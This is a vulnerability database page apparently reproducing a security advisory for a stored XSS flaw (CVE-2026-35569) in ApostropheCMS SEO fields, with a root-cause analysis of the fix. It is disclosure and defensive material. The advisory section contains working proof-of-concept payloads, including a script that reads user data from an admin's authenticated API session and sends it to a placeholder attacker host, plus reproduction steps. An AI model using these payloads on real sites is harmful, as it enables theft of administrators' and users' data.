8.7

CVSS Score

3.1

-

CVSS Score

Basic Information

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2026-35569

CVE-2026-35569: Stored XSS in SEO Fields Leads to Authenticated API Data Exposure in ApostropheCMS

Summary

A stored cross-site scripting (XSS) vulnerability exists in SEO-related fields (SEO Title and Meta Description) in ApostropheCMS.

Improper neutralization of user-controlled input in SEO-related fields allows injection of arbitrary JavaScript into HTML contexts, resulting in stored cross-site scripting (XSS). This can be leveraged to perform authenticated API requests and exfiltrate sensitive data, resulting in a compromise of application confidentiality.

Affected Version

ApostropheCMS (tested on version: v4.28.0)

Vulnerability Details

User-controlled input in SEO fields is improperly handled and rendered into HTML contexts such as:

<title>
<meta> attributes
structured data (JSON-LD)

This allows attackers to inject and execute arbitrary JavaScript in the context of authenticated users.

PoC 1

The following payload demonstrates breaking out of HTML context:

"></title><script>alert(1)</script>

This confirms:

Improper output encoding
Ability to escape <title> / <meta> contexts
Arbitrary script execution

PoC 2

This PoC demonstrates how the stored XSS can be leveraged to perform authenticated API requests and exfiltrate sensitive data.

"></title><script>
fetch('/api/v1/@apostrophecms/user', {
  credentials:'include'
})
.then(r=>r.text())
.then(d=>{
  fetch('http://ATTACKER-IP:5656/?data='+btoa(d))
})
</script>

Video Proof of Concept

Watch the following YouTube video for a full demonstration of the exploit:

PoC Video: https://youtu.be/FZuulua_pa8

Steps to Reproduce

Start a local listener: python3 -m http.server 5656
Login to ApostropheCMS as an authenticated user
Create or edit a page
Navigate to SEO settings
Insert the payload into the SEO Title field and Meta Description

"></title><script>
fetch('/api/v1/@apostrophecms/user',{
  credentials:'include'
})
.then(r=>r.text())
.then(d=>{
  fetch('http://ATTACKER-IP:5656/?data='+btoa(d))
})
</script>

Set Schema Type to "Web page"
Save and publish the page
Have an administrator visit the page

Result

The payload executes in the admin’s browser
The script sends a request to: /api/v1/@apostrophecms/user
The response contains sensitive user data:
- usernames
- email addresses
- roles (including admin)
The data is exfiltrated to the attacker-controlled server:
- http://ATTACKER-IP:5656

Evidence

The attacker server receives:
- GET /?data=BASE64_ENCODED_RESPONSE
Decoding the response reveals sensitive application data.

Security Impact

This vulnerability allows an attacker to:

Execute arbitrary JavaScript in an authenticated admin context
Perform authenticated API requests (session riding)
Access sensitive application data via internal APIs
Exfiltrate sensitive data to an external attacker-controlled server

References

Fix commit: https://github.com/apostrophecms/apostrophe/commit/0e57dd07a56ae1ba1e3af646ba026db4d0ab5bb3
https://www.cve.org/CVERecord?id=CVE-2026-35569
https://nvd.nist.gov/vuln/detail/CVE-2026-35569
https://github.com/Chittu13/cve-research/tree/main/CVE-2026-35569

(GitHub Advisory)

Miggo Vulnerability Database

→

CVE-2026-35569

CVE-2026-35569:

8.7

CVSS Score

3.1

-

CVSS Score

Basic Information

Is this CVE running in your environment?

Easily map the attack path and prioritize which CVEs are a threat to your organization

Validate Exposure

Technical Details

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
apostrophe	npm	<= 4.28.0	4.29.0

Technical Details

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability was a stored Cross-Site Scripting (XSS) issue in ApostropheCMS, originating from the handling of SEO Title and Meta Description fields. The analysis of the patch commit 0e57dd07a56ae1ba1e3af646ba026db4d0ab5bb3 reveals the root cause. The function getMetaHead in packages/seo/lib/nodes.js was responsible for generating JSON-LD structured data for SEO purposes. It took user-provided input from the SEO fields, stringified it using JSON.stringify, and then passed it to the template rendering engine as a raw node. The renderNodes function in packages/apostrophe/modules/@apostrophecms/template/index.js would then render this raw content directly into the HTML without any escaping. This allowed an attacker to craft a payload like "></title><script>alert(1)</script> which would break out of the intended JSON-LD <script> tag and execute arbitrary JavaScript in the context of the user viewing the page. The fix involved introducing a new function, safeJsonForScript, which explicitly escapes characters like < to prevent breaking out of the script context. The getMetaHead function was modified to use a new { json: data } node type, which is then safely processed by the updated renderNodes function, ensuring that any user-provided data is securely embedded.

Vulnerable functions

getMetaHead

packages/seo/lib/nodes.js

The `getMetaHead` function was vulnerable because it used `JSON.stringify` to serialize data containing user-controlled input (from SEO fields) and then instructed the rendering engine to output this string as a raw, unescaped value within a `<script>` tag. This allowed an attacker to inject malicious HTML and script content (e.g., `</script><script>alert(1)</script>`) that would be executed in the user's browser.

renderNodes

packages/apostrophe/modules/@apostrophecms/template/index.js

The `renderNodes` function contributed to the vulnerability by processing `raw` nodes, which output content without any escaping. While not the source of the vulnerability itself, it was the mechanism that allowed the unescaped, malicious string generated by `getMetaHead` to be rendered into the final HTML. The patch introduces a new `json` node type that uses a safe escaping mechanism (`safeJsonForScript`) to mitigate this.

Vulnerability Intelligence
Miggo AI

Unlock WAF rules for this CVE

Generate vendor-ready rules for the observed attack patterns, plus reasoning and safe deployment guidance

Get WAF rules

WAF Protection Rules

WAF Rule

W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.

Reasoning

*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.

8.7

-

Basic Information

Basic Information

Concerned about an active attack path?

CVE-2026-35569: Stored XSS in SEO Fields Leads to Authenticated API Data Exposure in ApostropheCMS

Summary

Affected Version

Vulnerability Details

PoC 1

PoC 2

Video Proof of Concept

Steps to Reproduce

Result

Evidence

Security Impact

References

CVE-2026-35569:

8.7

-

Basic Information

Basic Information

Is this CVE running in your environment?

Technical Details

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

Vulnerability IntelligenceMiggo AI

Unlock WAF rules for this CVE

WAF Protection Rules

WAF Rule

Reasoning

Basic Information

Basic Information

Technical Details

8.7

8.7

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

CVE-2026-35569: Stored XSS in SEO Fields Leads to Authenticated API Data Exposure in ApostropheCMS

Summary

Affected Version

Vulnerability Details

PoC 1

PoC 2

Video Proof of Concept

Steps to Reproduce

Result

Evidence

Security Impact

References

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI